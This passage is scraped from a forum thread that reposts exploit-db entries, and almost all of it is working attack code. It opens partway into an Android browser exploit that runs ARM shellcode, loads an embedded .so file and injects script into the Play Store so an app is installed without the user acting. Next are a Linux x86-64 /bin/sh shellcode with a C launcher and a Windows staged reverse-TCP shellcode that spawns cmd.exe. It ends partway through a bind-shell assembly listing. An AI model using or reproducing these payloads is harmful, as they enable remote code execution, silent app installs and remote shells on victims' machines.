1,0xcc,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x02,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xd8,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0xb0,0x13,0xd5,0xe1,0x01,0x80,0x88,0xe2,0x28,0x70,0x87,0xe2,0x01,0x00,0x58,0xe1,0xd3,0xff,0xff,0xba,0x4c,0x40,0x9d,0xe5,0x44,0x90,0x9d,0xe5,0x24,0xa0,0x9d,0xe5,0x20,0x20,0x9d,0xe5,0x2c,0x30,0x9d,0xe5,0x20,0xc0,0x9d,0xe5,0x14,0xe0,0x92,0xe5,0x10,0x10,0x93,0xe5,0x10,0x30,0x9a,0xe5,0x10,0x60,0x9c,0xe5,0xae,0x21,0xb0,0xe1,0x01,0x70,0x85,0xe0,0x03,0xe0,0x85,0xe0,0x06,0x60,0x85,0xe0,0x1b,0x00,0x00,0x0a,0x00,0x80,0xa0,0xe3,0x24,0xb0,0x8d,0xe5,0x1c,0xb0,0x9d,0xe5,0x1c,0x90,0x8d,0xe5,0x08,0x90,0xa0,0xe1,0x20,0x80,0x9d,0xe5,0x20,0xa0,0x8d,0xe5,0x06,0xa0,0xa0,0xe1,0x0e,0x60,0xa0,0xe1,0x14,0x50,0x8d,0xe5,0x04,0x20,0x9a,0xe5,0x01,0x90,0x89,0xe2,0x08,0xa0,0x8a,0xe2,0x08,0x50,0x1a,0xe5,0x10,0x00,0x9d,0xe5,0x52,0xe4,0xef,0xe7,0x0e,0x12,0x96,0xe7,0x01,0x10,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x05,0x00,0x84,0xe7,0x14,0x30,0x98,0xe5,0xa3,0x01,0x59,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x50,0x9d,0xe5,0x06,0xe0,0xa0,0xe1,0x24,0xb0,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x20,0xa0,0x9d,0xe5,0x14,0xc0,0x99,0xe5,0x10,0x20,0x99,0xe5,0xac,0x11,0xb0,0xe1,0x00,0x10,0xa0,0x13,0x02,0x50,0x85,0xe0,0x01,0x00,0xa0,0x11,0x0c,0x00,0x00,0x0a,0x01,0x30,0xa0,0xe1,0x01,0x00,0x80,0xe2,0x05,0xc0,0xb3,0xe7,0x08,0x10,0x81,0xe2,0x04,0x20,0x93,0xe5,0x52,0x34,0xef,0xe7,0x03,0x22,0x8e,0xe0,0x04,0x30,0x92,0xe5,0x04,0x20,0x83,0xe0,0x04,0x20,0x8c,0xe7,0x14,0xc0,0x99,0xe5,0xac,0x01,0x50,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x00,0x9a,0xe5,0x2b,0x1b,0x9f,0xed,0x20,0x22,0xb0,0xe1,0x20,0x1b,0x8d,0xed,0x0e,0x80,0xa0,0x11,0x00,0x60,0xa0,0x13,0x80,0x50,0x8d,0x12,0x04,0x00,0x00,0x1a,0x0d,0x00,0x00,0xea,0x14,0x90,0x9a,0xe5,0x10,0x80,0x88,0xe2,0x29,0x02,0x56,0xe1,0x09,0x00,0x00,0x2a,0x00,0xe0,0x98,0xe5,0x05,0x10,0xa0,0xe1,0x01,0x60,0x86,0xe2,0x0e,0x00,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0xf4,0xff,0xff,0x1a,0x04,0x70,0x98,0xe5,0x07,0x40,0x84,0xe0,0x01,0x00,0x00,0xea,0xcc,0x4c,0x0c,0xe3,0x14,0x48,0xdf,0xe7,0x18,0xb0,0x9d,0xe5,0x70,0x10,0x8d,0xe2,0xe8,0x20,0x8d,0xe2,0x30,0x50,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x0c,0xa0,0x9b,0xe5,0x08,0x30,0x9b,0xe5,0x00,0xa0,0x8d,0xe5,0x35,0xff,0x2f,0xe1,0x18,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x4b,0xdf,0x8d,0xe2,0xf0,0x8f,0xbd,0xe8,0x00,0x90,0xa0,0xe1,0x20,0x00,0x8d,0xe5,0x00,0xa0,0xa0,0xe1,0x2c,0x00,0x8d,0xe5,0x00,0x20,0xa0,0xe1,0x00,0x30,0xa0,0xe1,0x98,0xff,0xff,0xea,0x00,0xf0,0x20,0xe3,0x73,0x6f,0x5f,0x6d,0x61,0x69,0x6e,0x00,]; var so_str = "7f454c460101010000000000000000000300280001000000000000003400000044110000000000053400200008002800150014000600000034000000340000003400000000010000000100000400000004000000030000003401000034010000340100001300000013000000040000000100000001000000000000000000000000000000d80d0000d80d0000050000000010000001000000a40e0000a41e0000a41e00006c01000082010000060000000010000002000000a80e0000a81e0000a81e00002801000028010000060000000400000051e574640000000000000000000000000000000000000000060000000000000001000070d40c0000d40c0000d40c00002000000020000000040000000400000052e57464a40e0000a41e0000a41e00005c0100005c01000006000000040000002f73797374656d2f62696e2f6c696e6b657200000000000000000000000000000000000001000000000000000000000012000000100000000000000000000000120000001d00000000000000000000001200000034000000000000000000000012000000480000000000000000000000120000004f000000000000000000000012000000560000000000000000000000120000005d000000a00800003404000012000800650000000000000000000000120000006e0000000000000000000000120000007f0000000000000000000000110000009100000010200000000000001000f1ff9800000010200000000000001000f1ffa400000026200000000000001000f1ff005f5f6378615f66696e616c697a65005f5f6378615f617465786974005f5f61656162695f756e77696e645f6370705f707230005f5f616e64726f69645f6c6f675f7072696e74006d616c6c6f63006d656d736574006d656d63707900736f5f6d61696e006d70726f74656374005f5f737461636b5f63686b5f6661696c005f5f737461636b5f63686b5f6775617264005f6564617461005f5f6273735f7374617274005f656e64006c6962632e736f006c69626d2e736f006c6962737464632b2b2e736f006c69626d656469616e646b2e736f006c69627574696c732e736f006c696262696e6465722e736f006c69626d656469612e736f006c696273746167656672696768742e736f006c696273746167656672696768745f666f756e646174696f6e2e736f006c6962637574696c732e736f006c6962696e7075742e736f006c6962646c2e736f006c6962616e64726f69645f72756e74696d652e736f0072636532757873732e736f00000000030000000f0000000c0000000e0000000d0000000000000000000000000000000200000001000000040000000000000006000000050000000800000007000000030000000a000000090000000b000000a41e0000170000000020000017000000d01f0000150b0000e01f000016010000e41f000016020000e81f000016040000ec1f000016050000f01f000016060000f41f000016070000f81f000016090000fc1f0000160a000004e02de504e09fe50ee08fe008f0bee5741b000000c68fe201ca8ce274fbbce500c68fe201ca8ce26cfbbce500c68fe201ca8ce264fbbce500c68fe201ca8ce25cfbbce500c68fe201ca8ce254fbbce500c68fe201ca8ce24cfbbce500c68fe201ca8ce244fbbce500c68fe201ca8ce23cfbbce500482de904b08de20c309fe503308fe00300a0e1e1ffffeb0088bde8281b000000482de904b08de208d04de208000be508301be5000053e30100000a08301be533ff2fe104d04be20088bde800482de904b08de208d04de208000be528309fe503308fe00300a0e108101be51c309fe503308fe00320a0e1cbffffeb0030a0e10300a0e104d04be20088bde8b8ffffffc41a000020d04de20c008de508108de504208de500308de50030a0e31730cde50030a0e318308de5210000ea0030a0e31c308de50030a0e31c308de50f0000ea18209de51c309de5033082e004209de5033082e00020d3e50c109de51c309de5033081e00030d3e5030052e10000000a060000ea1c309de5013083e21c308de51c209de508309de5030052e1ebffff3a1c209de508309de5030052e10100001a18309de5090000ea18309de5013083e218308de518209de508309de5032082e000309de5030052e1d7ffff9a0030e0e30300a0e120d08de21eff2fe104e02de524d04de20c008de508108de514329fe503308fe0003093e50320a0e108329fe503308fe002c0a0e10700b3e800008ce504108ce508208ce5f0319fe503308fe00030d3e5013023e27330efe6000053e36900000ad8319fe503308fe00120a0e30020c3e508309de500308de50600a0e3c0319fe503308fe00310a0e1b8319fe503308fe00320a0e10c309de56dffffeb08309de5003093e510308de510309de5043083e2003093e514308de510309de50c3083e218308de518309de500308de50600a0e374319fe503308fe00310a0e16c319fe503308fe00320a0e114309de558ffffeb5c319fe503308fe0002093e514309de5033082e00300a0e154ffffeb0030a0e11c308de53c319fe503308fe0002093e514309de5033082e01c009de50010a0e30320a0e14cffffeb10309de51c009de50310a0e10c20a0e34affffeb1c309de50c1083e200319fe503308fe0002093e5f8309fe503308fe0003093e50100a0e10210a0e10320a0e13effffebe0309fe503308fe0003093e50c3083e21c209de5032082e018309de50200a0e10310a0e114209de533ffffeb1c309de5043083e2b0209fe502208fe0001092e514209de5022081e0002083e51c309de5043083e2003093e51c209de50c2082e200208de50600a0e380209fe502208fe00210a0e178209fe502208fe015ffffeb08309de51c209de5002083e564309fe503308fe0003093e5013083e20c009de508109de533ff2fe10030a0e10300a0e124d08de204f09de4d4190000a8190000ac190000901900004406000040060000f005000008060000f8180000d418000090180000881800006c18000038180000dc040000f4040000d817000010402de928d04de20c008de570439fe504408fe06c339fe5033094e7003093e524308de560339fe503308fe00030d3e5013023e27330efe6000053e3c700000a48339fe503308fe00120a0e30020c3e50600a0e338339fe503308fe00310a0e130339fe503308fe00320a0e10c309de5d9feffeb0c309de5003093e514308de50600a0e310339fe503308fe00310a0e108339fe503308fe00320a0e114309de5cdfeffeb0c309de5183083e2003093e50320a0e1e8329fe503308fe0002083e50c309de51c3083e2002093e5d4329fe503308fe0002083e5cc329fe503308fe0003093e5c4229fe502208fe0001092e5bc229fe502208fe0002092e500108de504208de50600a0e3a8229fe502208fe00210a0e1a0229fe502208fe0aefeffeb98229fe502208fe01c308de2000092e5041092e50300a3e814309de580229fe502208fe00200a0e10c10a0e30320a0e180330ce3c93140e3d6feffeb18008de518209de514309de5032082e054329fe503308fe0002083e54c329fe503308fe0003093e50c3083e2012083e23c329fe503308fe0002083e534329fe503308fe0003093e50600a0e328229fe502208fe00210a0e120229fe502208fe086feffeb18309de5010073e36400000a010aa0e384feffeb0030a0e10320a0e1fc319fe503308fe0002083e5f4319fe503308fe0003093e50600a0e3e8219fe502208fe00210a0e1e0219fe502208fe072feffebd8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e375feffebb8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e36cfeffeb98319fe503308fe0002093e590319fe503308fe002c0a0e10700b3e800008ce504108ce508208ce578319fe503308fe0003093e50c2083e2df380fe300304fe3003082e560319fe503308fe0002093e51030a0e3033082e050219fe502208fe0002092e5002083e50600a0e340319fe503308fe00310a0e138319fe503308fe00320a0e130319fe503308fe03cfeffeb0600a0e324319fe503308fe00310a0e11c319fe503308fe00320a0e134feffeb10319fe503308fe0003093e50320a0e1df380fe300304fe3003082e5f8309fe503308fe0003093e5043083e2ec209fe502208fe0002083e50600a0e3e0309fe503308fe00310a0e1d8309fe503308fe00320a0e11efeffeb20309fe5033094e724209de5003093e5030052e10000000a26feffeb28d08de21080bde81c170000fcffffff5517000039170000f40300001c040000c403000008040000b8160000a416000098160000881600007c160000400300009c030000040400001c16000008160000fc150000d8150000dc150000a0020000100300008c1500008015000050020000dc020000581500004015000010150000f4140000e8140000cc140000b41400008401000020020000a8faffff5c010000140200006c1400005014000050faffff04010000c801000084f8ff7fb0b0078054f9ff7f00840880bcfbff7fb0a80980e8ffff7f010000006578706c6f697400746869732069732025782c736f75726365436f6465206174202578006c656e2069732025642c25730000000061727261792062756666657220616464726573732061742025780000646c6f70656e206164647265737320617420257800000000737472696e672069732025642c25702c2573000066696e6420636f6d70696c652066756e6374696f6e20617420257800636f6465736e6970742061742025700066616b655f646f4578656375746553637269707420617420257000006265666f726520686f6f6b00616674657220686f6f6b00000302010204050607000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c404000003000000d41f000002000000400000001700000010040000140000001100000011000000f803000012000000180000001300000008000000faffff6f0200000006000000480100000b0000001000000005000000380200000a0000006d01000004000000a803000001000000a900000001000000b100000001000000b900000001000000c600000001000000d500000001000000e100000001000000ee00000001000000fa000000010000000c010000010000002901000001000000360100000100000042010000010000004b0100000e000000610100001a000000a41e00001c000000040000001e00000008000000fbffff6f01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005004000050040000500400005004000050040000500400005004000050040000002000002de9f04f0746a1b008468846004743433a2028474e552920342e3800040000000900000004000000474e5500676f6c6420312e3131000000413d00000061656162690001330000000541524d20763700060a0741080109020a030c011102120414011501170318011a021b031e0622012a012c02440372636532757873732e736f0064b3a5da002e7368737472746162002e696e74657270002e64796e73796d002e64796e737472002e68617368002e72656c2e64796e002e72656c2e706c74002e74657874002e41524d2e6578696478002e726f64617461002e66696e695f6172726179002e64796e616d6963002e676f74002e64617461002e627373002e636f6d6d656e74002e6e6f74652e676e752e676f6c642d76657273696f6e002e41524d2e61747472696275746573002e676e755f64656275676c696e6b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b000000010000000200000034010000340100001300000000000000000000000100000000000000130000000b000000020000004801000048010000f0000000030000000100000004000000100000001b000000030000000200000038020000380200006d01000000000000000000000100000000000000230000000500000002000000a8030000a80300005000000002000000000000000400000004000000290000000900000002000000f8030000f8030000180000000200000000000000040000000800000032000000090000000200000010040000100400004000000002000000070000000400000008000000360000000100000006000000500400005004000074000000000000000000000004000000000000003b0000000100000006000000c4040000c40400001008000000000000000000000400000000000000410000000100007082000000d40c0000d40c000020000000080000000000000004000000080000004c0000000100000002000000f40c0000f40c0000e400000000000000000000000400000000000000540000000f00000003000000a41e0000a40e00000400000000000000000000000400000000000000600000000600000003000000a81e0000a80e00002801000003000000000000000400000008000000690000000100000003000000d01f0000d00f000030000000000000000000000004000000000000006e000000010000000300000000200000001000001000000000000000000000000400000000000000740000000800000003000000102000001010000016000000000000000000000004000000000000007900000001000000300000000000000010100000100000000000000000000000010000000100000082000000070000000000000000000000201000001c00000000000000000000000400000000000000990000000300007000000000000000003c1000003e00000000000000000000000100000000000000a90000000100000000000000000000007a1000001000000000000000000000000100000000000000010000000300000000000000000000008a100000b800000000000000000000000100000000000000"; var arrayBuffer = new ArrayBuffer(0x1000000); var arrayBufferAddress = getObjAddr(arrayBuffer)-1; var backingStoreAddress = read_uint32(arrayBufferAddress+4*4); var args_address = backingStoreAddress+1024; function write_shellcode(dlsym_addr,buffer){ //ldr r0,[pc,4]//0xe59f0004 //ldr r1,[pc,4]//0xe59f1004 //b shellcode;//0xea000001 //dlopen_addr//array_buffer_address //dlsym_addr //shellcode //var stub=[0xe59f0004,0xe59f1004,0xea000001,dlsym_addr+0xc,dlsym_addr]; var stub=[0xe59f0004,0xe59f1004,0xea000001,args_address,0x1000000]; for(var i=0;i<stub.length;i++){ globaldv[buffer/4+i]=stub[i]; } shellcode = shellcode.concat([0,0,0,0]); for(var i=0;i<shellcode.length/4>>>0;i++){ // u8arr[i+4*stub.length]=shellcode[i]; globaldv[buffer/4+stub.length+i] = (shellcode[4*i+3]<<24)+(shellcode[4*i+2]<<16)+(shellcode[4*i+1]<<8)+(shellcode[4*i]); } return stub.length*4+shellcode.length; } function xss_code(){ //alert(navigator.userAgent); //alert(document.cookie); var i1=setInterval(function(){ if(!(document&&document.body&&document.body.innerHTML&&document.body.innerHTML.match(/This app is compatible/)!=null)){ console.log("wait load complete"); return; } clearInterval(i1); var i2=setInterval(function(){ document.getElementsByClassName("price buy id-track-click")[0].click(); var installButton = document.getElementById("purchase-ok-button"); if(installButton == null) return; installButton.click(); document.write("<h1>The app will be installed shortly, Pwned by 360 Alpha Team</h1>"); clearInterval(i2); setTimeout(function(){ window.open("intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;end"); },26000); },500); },500); } var js_str="\n"+xss_code.toString()+"xss_code();\n"; //var backup_arr = backup_original_code(huge_func_code_entry); var writed_len = write_shellcode(dlsym_addr,huge_func_code_entry); var args_view = new DataView(arrayBuffer,1024,100); var so_file_view = new DataView(arrayBuffer,4096); var js_view = new DataView(arrayBuffer,0x100000); args_view.setUint32(0,dlsym_addr+0xc,true); args_view.setUint32(4,dlsym_addr,true); args_view.setUint32(8,huge_func_code_entry,true); args_view.setUint32(12,writed_len,true); args_view.setUint32(16,backingStoreAddress+4096,true); args_view.setUint32(20,so_str.length/2,true); args_view.setUint32(24,backingStoreAddress+0x100000,true); args_view.setUint32(28,js_str.length,true); print("length is "+so_str.length); for(var i=0;i<so_str.length;i+=2){ var value = so_str.substr(i,2); value = "0x"+value; so_file_view.setUint8(i/2,parseInt(value)); } for(var i=0;i<js_str.length;i++){ js_view.setUint8(i,js_str.charCodeAt(i)); } print("begin execute shellcode"); huge_func({}); print("done"); postMessage(true); //prevent arrayBuffer to be released while(1){} } //main world function print(){ console.log.apply(null,arguments); document.write('<p >'); document.write.apply(document,arguments); document.write("<p>"); } // Build a worker from an anonymous function body var blobURL = URL.createObjectURL( new Blob([ '(',exploit.toString(),')()' ], { type: 'application/javascript' } ) ); var worker; var exploitSucc = false; var count = 0; function startExploit(){ print("worker thread is started"); worker = new Worker( blobURL ); count++; worker.onmessage = function(e){ print("exploit result is "+e.data); exploitSucc = e.data; if(exploitSucc==false){ startExploit(); return; } var end = +new Date(); print("time diff is "+(end-begin)/1000); //top.location='https://play.google.com/store/apps/details?id=com.google.zxing.client.android'; top.location='https://play.google.com/store/apps/details?id=com.kitkats.qrscanner'; } } var begin = +new Date(); startExploit(); var savedCount = 0; var hangMonitor = setInterval(function (){ if(exploitSucc==true){ clearInterval(hangMonitor); }else{ if(savedCount==count){//maybe hang print("worker maybe hange"); worker.terminate(); startExploit(); }else{ print("worker is normal"); savedCount = count; } } },10000); //URL.revokeObjectURL( blobURL ); </script> </html> Sursa: https://www.exploit-db.com/exploits/42175/. Platform: Android.
  11. /* ;Title: Linux/x86-64 - /bin/sh Shellcode ;Author: Touhid M.Shaikh ;Contact: https://github.com/touhidshaikh ;Category: Shellcode ;Architecture: Linux x86_64 ;Description: This shellcode baased on "JMP CALL POP" method to Execute "/bin//sh". Length of shellcode is 31 bytes. ;Tested on : #1 SMP PREEMPT RT Debian 4.9.25-1kali1 (2017-05-04) ===COMPILATION AND EXECUTION=== #nasm -f elf64 shell.asm -o shell.o #ld shell.o -o shell <=== Making Binary File #./bin2shell.sh shell <== xtract hex code from the binary(https://github.com/touhidshaikh/bin2shell) =================SHELLCODE(INTEL FORMAT)================= section .text global _start _start: jmp shell here: xor rax,rax pop rdi xor rsi,rsi xor rdx,rdx add rax,59 syscall shell: call here bash db "/bin//sh" ===================END HERE============================ Compile with gcc with some options. # gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing */ #include<stdio.h> #include<string.h> unsigned char code[] = \ "\xeb\x10\x48\x31\xc0\x5f\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05\xe8\xeb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68"; main() { printf("Touhid Shaikh (http://www.touhidshaikh.com)\n"); printf("Shellcode Length : %d\n", (int)strlen(code)); int (*ret)() = (int(*)())code; ret(); } Sursa: https://www.exploit-db.com/exploits/42126/.
  12. ########### Windows x86 Reverse TCP Staged Alphanumeric Shellcode CreateProcessA cmd.exe ######## ########### Author: Snir Levi, Applitects ############# ## 332 Bytes ## ## For Educational Purposes Only ## Date: 01.03.17 Author: Snir Levi Email: snircontact@gmail.com https://github.com/snir-levi/ IP - 127.0.0.1 PORT - 4444 Tested on: Windows 7 Windows 10 ###Usage### Victim Executes the first stage shellcode, and opens tcp connection After Connection is established, send the Alphanumeric stage to the connection nc -lvp 4444 connect to [127.0.0.1] from localhost [127.0.0.1] (port) RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Users\> ########### ##Shellcode## #### Second Stage Alphanumeric shellcode: ##### RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS R push edx P push eax hoces push 0x7365636f //oces htePr push 0x72506574 //tePr hCrea push 0x61657243 //Crea T push esp Q push ecx PX will be replaced with call [esi] (0x16ff) L*8 dec esp // offset esp to kernel32.dll Address Y pop ecx // ecx = kernel32 F*4 inc esi -> offset [esi+4] PX will be replaced with mov [esi],eax (0x0689) N*4 dec esi -> offset [esi] j0 push 0x30 X pop eax H*48 dec eax // zeroing eax P push eax hessA push 0x41737365 //essA (will be null terminated) hProc push 0x636f7250 //Proc hExit push 0x74697845 //Exit T push esp Q push ecx PX will be replaced with call [esi] (0x16ff) F*8 inc esi -> offset [esi+8] PX will be replaced with mov [esi],eax (0x0689) Z*10 offset stack to &processinfo j0 push 0x30 Y pop ecx I*48 dec ecx // zeroing ecx T push esp X pop eax //eax = &PROCESS_INFORMATION Q*4 push ecx //sub esp,16 W push edi W push edi W push edi Q push ecx Q push ecx B inc edx R push edx Q*10 push ecx jD push 0x44 T push esp Z pop edx //edx = &STARTUPINFOA hexeC push 0x65 hcmd. push 0x78652e64 T push esp // &'cmd.exe' Y pop ecx P push eax // &PROCESS_INFORMATION R push edx // &STARTUPINFOA j0 push 0x30 Z pop edx J*48 dec edx // zeroing edx R*3 push edx B inc edx R push edx J dec edx R*2 push edx Q push ecx ; &'cmd.exe' R push edx A*7 inc ecx //offset ecx to [C]exeh -> will be null terminated N*4 dec esi //offset [esi+4] to CreateProccesA S push ebx ; return address ## First Stage Shellcode ## global _start section .text _start: xor eax,eax push eax ; null terminator for createProcA mov eax,[fs:eax+0x30] ; Proccess Enviroment Block mov eax,[eax+0xc] mov esi,[eax+0x14] lodsd xchg esi,eax lodsd mov ebx,[eax+0x10] ; kernel32 mov ecx,[ebx+0x3c] ; DOS->elf_anew add ecx, ebx; Skip to PE start mov ecx, [ecx+0x78] ; offset to export table add ecx,ebx ; kernel32 image_export_dir mov esi,[ecx+0x20] ; Name Table add esi,ebx xor edx,edx getProcAddress: inc edx lodsd add eax,ebx cmp dword [eax],'GetP' jne getProcAddress cmp dword [eax+4],'rocA' jne getProcAddress ;---Function Adresses Chain---- ;[esi] GetProcAddress ;[esi+12] WSAstartup ;[esi+16] WSASocketA ;[esi+20] connect ;[esi+24] recv ;[esi+28] kernel32 ;Alphanumeric stage store: ;[esi+4] CreateProcessA ;[esi+8] ExitProccess mov esi,[ecx+0x1c] ; Functions Addresses Chain add esi,ebx mov edx,[esi+edx*4] add edx,ebx ; GetProcAddress sub esp, 32 ; Buffer for the function addresses chain push esp pop esi mov [esp],edx ; esi offset 0 -> GetProcAddress mov [esi+28],ebx ;esi offset 28 -> kernel32 ;--------winsock2.dll Address-------------- xor edi,edi push edi push 0x41797261 ; Ayra push 0x7262694c ; rbiL push 0x64616f4c ; daoL push esp push ebx call [esi] ;-----ws2_32.dll Address------- xor ecx,ecx push ecx mov cx, 0x3233 ; 0023 push ecx push 0x5f327377 ; _2sw push esp call eax mov ebp,eax ;ebp = ws2_32.dll ;-------WSAstartup Address------------- xor ecx,ecx push ecx mov cx, 0x7075 ; 00up push ecx push 0x74726174 ; trat push 0x53415357 ; SASW push esp push ebp call [esi] mov [esi+12],eax ;esi offset 12 -> WSAstartup ;-------WSASocketA Address------------- xor ecx,ecx push ecx mov cx, 0x4174 ; 00At push ecx push 0x656b636f ; ekco push 0x53415357 ; SASW push esp push ebp call [esi] mov [esi+16],eax;esi offset 16 -> WSASocketA ;------connect Address----------- push edi mov ecx, 0x74636565 ; '\0tce' shr ecx, 8 push ecx push 0x6e6e6f63 ; 'nnoc' push esp push ebp call [esi] mov [esi+20],eax;esi offset 20 -> connect ;------recv Address------------- push edi push 0x76636572 ;vcer push esp push ebp call [esi] mov [esi+24],eax;esi offset 24 -> recv ;------call WSAstartup()---------- xor ecx,ecx sub sp,700 push esp mov cx,514 push ecx call [esi+12] ;--------call WSASocket()----------- ; WSASocket(AF_INET = 2, SOCK_STREAM = 1, ; IPPROTO_TCP = 6, NULL, ;(unsigned int)NULL, (unsigned int)NULL); push eax ; if successful, eax = 0 push eax push eax mov al,6 push eax mov al,1 push eax inc eax push eax call [esi+16] xchg eax, edi ; edi = SocketRefernce ;--------call connect---------- ;struct sockaddr_in { ; short sin_family; ; u_short sin_port; ; struct in_addr sin_addr; ; char sin_zero[8]; ;}; push byte 0x1 pop edx shl edx, 24 mov dl, 0x7f ;edx = 127.0.0.1 (hex) push edx push word 0x5c11; port 4444 push word 0x2 ;int connect( ;_In_ SOCKET s, ;_In_ const struct sockaddr *name, ;_In_ int namelen ;); mov edx,esp push byte 16 ; sizeof(sockaddr) push edx ; (sockaddr*) push edi ; socketReference call [esi+20] ;--------call recv()---------- ;int recv( ;_In_ SOCKET s, ;_Out_ char *buf, ;_In_ int len, ;_In_ int flags ;); stage: push eax mov ax,950 push eax ;buffer length push esp pop ebp sub ebp,eax ; set buffer to [esp-950] push ebp ;&buf push edi ;socketReference call [esi+24] executeStage: xor edx,edx mov byte [ebp+eax-1],0xc3 ; end of the Alphanumeric buffer -> ret mov byte [ebp+96],dl ; null terminator to ExitProcess mov byte [ebp-1],0x5b ; buffer start: pop ebx -> return address dec ebp mov word [ebp+20],0x16ff ; call DWORD [esi] mov word [ebp+35],0x0689 ; mov [esi],eax mov word [ebp+110],0x16ff; call DWORD [esi] mov word [ebp+120],0x0689; mov [esi],eax mov ax,0x4173 ; As (CreateProcessA) mov ecx,[esi+28] ; ecx = kernel32 dec dl ;edx = 0x000000ff call ebp ; Execute Alphanumeric stage executeShell: mov [ecx],dl ;null terminator to 'cmd.exe' call dword [esi] ;createProcA push eax call dword [esi+4] ; ExitProccess ----------------------- unsigned char shellcode[]= "\x31\xc0\x50\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x4b\x3c\x01\xd9\x8b\x49\x78\x01\xd9\x8b\x71\x20\x01\xde\x31\xd2\x42\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x8b\x71\x1c\x01\xde\x8b\x14\x96\x01\xda\x83\xec\x20\x54\x5e\x89\x14\x24\x89\x5e\x1c\x31\xff\x57\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\x16\x31\xc9\x51\x66\xb9\x33\x32\x51\x68\x77\x73\x32\x5f\x54\xff\xd0\x89\xc5\x31\xc9\x51\x66\xb9\x75\x70\x51\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x55\xff\x16\x89\x46\x0c\x31\xc9\x51\x66\xb9\x74\x41\x51\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x54\x55\xff\x16\x89\x46\x10\x57\xb9\x65\x65\x63\x74\xc1\xe9\x08\x51\x68\x63\x6f\x6e\x6e\x54\x55\xff\x16\x89\x46\x14\x57\x68\x72\x65\x63\x76\x54\x55\xff\x16\x89\x46\x18\x31\xc9\x66\x81\xec\xf4\x01\x54\x66\xb9\x02\x02\x51\xff\x56\x0c\x50\x50\x50\xb0\x06\x50\xb0\x01\x50\x40\x50\xff\x56\x10\x97\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52\x66\x68\x11\x5c\x66\x6a\x02\x89\xe2\x6a\x10\x52\x57\xff\x56\x14\x50\x66\xb8\xb6\x03\x50\x54\x5d\x29\xc5\x55\x57\xff\x56\x18\x31\xd2\xc6\x44\x05\xff\xc3\x88\x55\x60\xc6\x45\xff\x5b\x4d\x66\xc7\x45\x14\xff\x16\x66\xc7\x45\x23\x89\x06\x66\xc7\x45\x6e\xff\x16\x66\xc7\x45\x78\x89\x06\x66\xb8\x73\x41\x8b\x4e\x1c\xfe\xca\xff\xd5\x88\x11\xff\x16\x50\xff\x56\x04"; Sursa: https://www.exploit-db.com/exploits/41481/.
  13. Aveti aici pdf-ul. Sursa: exploit-db.com.
  14. ;The MIT License (MIT) ;Copyright (c) 2017 Robert L. Taylor ;Permission is hereby granted, free of charge, to any person obtaining a ;copy of this software and associated documentation files (the “Software”), ;to deal in the Software without restriction, including without limitation ;the rights to use, copy, modify, merge, publish, distribute, sublicense, ;and/or sell copies of the Software, and to permit persons to whom the ;Software is furnished to do so, subject to the following conditions: ;The above copyright notice and this permission notice shall be included ;in all copies or substantial portions of the Software. ;The Software is provided “as is”, without warranty of any kind, express or ;implied, including but not limited to the warranties of merchantability, ;fitness for a particular purpose and noninfringement. In no event shall the ;authors or copyright holders be liable for any claim, damages or other ;liability, whether in an action of contract, tort or otherwise, arising ;from, out of or in connection with the software or the use or other ;dealings in the Software. ; ; For a detailed explanation of this shellcode see my blog post: ; http://a41l4.blogspot.ca/2017/02/shellrandomlisten1434.html global _start section .text _start: ; Socket push 41 pop rax push 2 pop rdi push 1 pop rsi cdq syscall ; Listen xor esi,esi xchg eax,edi mov al,50 syscall ; Accept mov al,43 syscall ; Dup 2 push 3 pop 